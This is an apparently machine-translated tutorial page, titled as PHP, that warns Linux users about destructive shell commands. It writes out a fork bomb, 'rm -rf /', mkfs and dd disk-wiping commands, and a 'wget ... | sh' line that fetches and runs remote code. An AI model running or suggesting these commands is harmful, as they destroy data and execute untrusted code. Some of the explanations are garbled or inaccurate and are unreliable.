Home > Backend Development > PHP Tutorial > 9 PHP commands & codes that you must always be vigilant about_PHP Tutorial

9 PHP commands & codes that you must always be vigilant about_PHP Tutorial

WBOY
Release: 2016-07-13 10:13:29
Original
883 people have browsed it

9 PHP commands & codes that you must always be vigilant about

Linux shell/terminal commands are very powerful, even a simple command may cause folders, files or path folders to be deleted.

In some cases, Linux will not even ask you and directly execute the command, causing you to lose various data information.

Generally speaking, new Linux users are recommended to execute these commands on the Web. Of course, some people who have written this code do not think so, because this thing is no longer a joke once you write it down.

Here I have collected some Linux codes that are harmful to the system to help you avoid them. Remember: this code is very dangerous and can even be modified to become more harmful.

Something else to note: some commands are harmful only if they have the sudo prefix in Ubuntu. Other distributions of Linux will be harmful when used as root directory commands.

1. Linux Fork Bomb Command

:(){ :|: & };: Known as Fork Bomb, it is a denial of service attack on Linux systems. :(){ :|: & };: is a bash function. As long as it is executed, it will be repeated until the system is frozen.

You can only solve this problem by restarting the system. So be sure to pay attention when you execute this command on the Linux interface.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is also a dangerous command. Dev/null or null device is a device file that deletes all data written on this device file. However, the operation prompt is that the write operation was executed successfully. This is what we often call bit bucked or black hole.

3. Rm -Rf Command

The rm -rf command can quickly delete folders and their contents in Linux systems. If you don't know how to use it correctly, you will just cry.

The most common combinations and choices of the m-rf command are listed below:

  • rm command: Delete files in Linux system
  • rm -f command: Delete read-only files in the file without prompting
  • rm -r command loops to delete the contents of the folder
  • rm -d command: Delete the empty directory. If the directory is not empty, the operation will not be performed
  • rm -rf/ command: Forcefully delete all contents and subfolders in the root directory including write-protected files) command.
  • rm -rf* command: forcefully delete all contents in the current directory (current working directory) and subfolders
  • rm -rf. command: Forcefully delete all contents in the current folder directory/subdirectory. Same as rm -r.[^.]*

The rm -r.[^.]* command: delete files and folders with deletion prompts

4. Mkfs Command

If you don’t know the function of mkfs, then it is also a dangerous command. Any command written after mkfs will be formatted and replaced by a blank Linux file system.

The following are the commands that require administrator rights to format the hard disk:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos mkfs.reiserfs
  • mkfs.vfat

mkfs.cramfs can also do the same thing as the above code, but does not require administrative source permissions.

5. Tar Bomb

The tar command is used to put multiple files into one file in .tar format archive file). Tape Archive (Tar) bomb can be created by him.

When compressed, it is this archive file that generates tens of thousands of similarly named files that appear in the current directory instead of a new directory.

When receiving a tar file, regularly create a new protected directory and then place the received tar file into this directory before decompression, you can avoid becoming a victim of tar bomb.

6. Dd Command

Dd command is used to copy & change hard disk partitions. If you use it in the wrong place, it can be dangerous.

The dd commands are listed below:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

The following command will zero out the entire primary hard drive: dd if=/dev/zero of=/dev/had

7. Shell Script Code

Sometimes, you may be tricked into giving you a shell script file and asking you to download and execute it. The script may contain some malicious or dangerous code. The command form may be like this: wget http://some_malicious_source -O- | sh. wget will download the script when sh narrow script.

8. Malicious Source Code

Maybe someone will give you the source code and let you compile it. The code may be normal code, but there may be some malicious code disguised in the large source code. If so, your system is vulnerable. How to avoid it? Only source code from trustworthy sources is accepted and compiled.

9. Decompression Bomb

You have received a compressed file and you have been asked to extract this seemingly small file, possibly as small as KB. In fact, the small size of the compressed file contains highly compressed data.

As long as the file is decompressed, hundreds of GB of data will be extracted. At this time, the probability of overly large data filling the hard disk and causing downtime is very high. How to avoid it? As the old saying goes, don’t be cheap, accept any documents, please accept documents from trusted sources.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/915114.htmlTechArticle9 PHP commands that you must always be wary of amp; };: Famous for Fork Bomb, it is a denial of service attack Linux system. :(){ :|: };: is a bash function. As long as it is executed, he will keep repeating,...
Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template